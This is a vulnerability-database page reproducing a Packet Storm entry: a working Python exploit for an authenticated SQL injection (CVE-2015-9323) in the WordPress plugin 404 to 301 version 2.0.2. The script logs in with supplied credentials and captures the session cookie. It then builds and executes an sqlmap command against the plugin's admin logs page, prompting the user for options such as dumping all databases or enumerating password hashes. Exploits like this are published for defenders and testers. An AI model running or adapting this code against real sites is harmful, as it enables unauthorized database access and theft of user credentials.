Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormRon JostPACKETSTORM:165803
HistoryFeb 02, 2022 - 12:00 a.m.

WordPress 404 To 301 2.0.2 SQL Injection

2022-02-0200:00:00
Ron Jost
packetstormsecurity.com
190

0.007 Low

EPSS

Percentile

80.0%

JSON
`# Exploit Title: Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)  
# Date 30.01.2022  
# Exploit Author: Ron Jost (Hacker5preme)  
# Vendor Homepage: https://de.wordpress.org/plugins/404-to-301/  
# Software Link: https://downloads.wordpress.org/plugin/404-to-301.2.0.2.zip  
# Version: <= 2.0.2  
# Tested on: Ubuntu 20.04  
# CVE: CVE-2015-9323  
# CWE: CWE-89  
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2015-9323/README.md  
  
'''  
Description:  
The 404-to-301 plugin before 2.0.3 for WordPress has SQL injection.  
'''  
  
banner = '''   
  
.o88b. db db d88888b .d888b. .d88b. db ooooo .d888b. d8888b. .d888b. d8888b.   
d8P Y8 88 88 88' VP `8D .8P 88. o88 8P~~~~ 88' `8D VP `8D VP `8D VP `8D   
8P Y8 8P 88ooooo odD' 88 d'88 88 dP `V8o88' oooY' odD' oooY'   
8b `8b d8' 88~~~~~ C8888D .88' 88 d' 88 88 V8888b. C8888D d8' ~~~b. .88' ~~~b.   
Y8b d8 `8bd8' 88. j88. `88 d8' 88 `8D d8' db 8D j88. db 8D   
`Y88P' YP Y88888P 888888D `Y88P' VP 88oobY' d8' Y8888P' 888888D Y8888P'   
  
[+] 404 to 301 - SQL-Injection   
[@] Developed by Ron Jost (Hacker5preme)  
  
'''  
print(banner)  
  
import argparse  
import os  
import requests  
from datetime import datetime  
import json  
  
# User-Input:  
my_parser = argparse.ArgumentParser(description='Wordpress Plugin 404 to 301 - SQL Injection')  
my_parser.add_argument('-T', '--IP', type=str)  
my_parser.add_argument('-P', '--PORT', type=str)  
my_parser.add_argument('-U', '--PATH', type=str)  
my_parser.add_argument('-u', '--USERNAME', type=str)  
my_parser.add_argument('-p', '--PASSWORD', type=str)  
args = my_parser.parse_args()  
target_ip = args.IP  
target_port = args.PORT  
wp_path = args.PATH  
username = args.USERNAME  
password = args.PASSWORD  
  
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))  
  
  
# Authentication:  
session = requests.Session()  
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'  
check = session.get(auth_url)  
# Header:  
header = {  
'Host': target_ip,  
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',  
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',  
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',  
'Accept-Encoding': 'gzip, deflate',  
'Content-Type': 'application/x-www-form-urlencoded',  
'Origin': 'http://' + target_ip,  
'Connection': 'close',  
'Upgrade-Insecure-Requests': '1'  
}  
  
# Body:  
body = {  
'log': username,  
'pwd': password,  
'wp-submit': 'Log In',  
'testcookie': '1'  
}  
auth = session.post(auth_url, headers=header, data=body)  
  
# SQL-Injection (Exploit):  
  
# Generate payload for sqlmap  
print ('[+] Payload for sqlmap exploitation:')  
cookies_session = session.cookies.get_dict()  
cookie = json.dumps(cookies_session)  
cookie = cookie.replace('"}','')  
cookie = cookie.replace('{"', '')  
cookie = cookie.replace('"', '')  
cookie = cookie.replace(" ", '')  
cookie = cookie.replace(":", '=')  
cookie = cookie.replace(',', '; ')  
  
exploit_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=i4t3-logs&orderby=1"'  
exploit_risk = ' --level 2 --risk 2'  
exploit_cookie = r' --cookie="' + cookie + r'" '  
  
print(' Sqlmap options:')  
print(' -a, --all Retrieve everything')  
print(' -b, --banner Retrieve DBMS banner')  
print(' --current-user Retrieve DBMS current user')  
print(' --current-db Retrieve DBMS current database')  
print(' --passwords Enumerate DBMS users password hashes')  
print(' --tables Enumerate DBMS database tables')  
print(' --columns Enumerate DBMS database table column')  
print(' --schema Enumerate DBMS schema')  
print(' --dump Dump DBMS database table entries')  
print(' --dump-all Dump all DBMS databases tables entries')  
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')  
exploit_code = exploit_url + exploit_risk + exploit_cookie + retrieve_mode + ' -p orderby -v0'  
os.system(exploit_code)  
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))  
  
`

Related

prion 1
nvd 1
cve 1
wpvulndb 1
zdt 1
nuclei 1
cvelist 1
exploitdb 1
prion
prion
Sql injection
2019-08-16 21:15:00
nvd
nvd
CVE-2015-9323
2019-08-16 21:15:10
cve
cve
CVE-2015-9323
2019-08-16 21:15:10
wpvulndb
wpvulndb
404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection
2015-08-20 00:00:00
zdt
zdt
Wordpress 404 to 301 2.0.2 Plugin - SQL Injection (Authenticated) Exploit
2022-02-02 00:00:00
nuclei
nuclei
404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection
2023-08-14 11:09:55
cvelist
cvelist
CVE-2015-9323
2019-08-16 20:12:59
exploitdb
exploitdb
Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)
2022-02-02 00:00:00

0.007 Low

EPSS

Percentile

80.0%

JSON
Related for PACKETSTORM:165803
prion1nvd1cve1wpvulndb1zdt1nuclei1cvelist1exploitdb1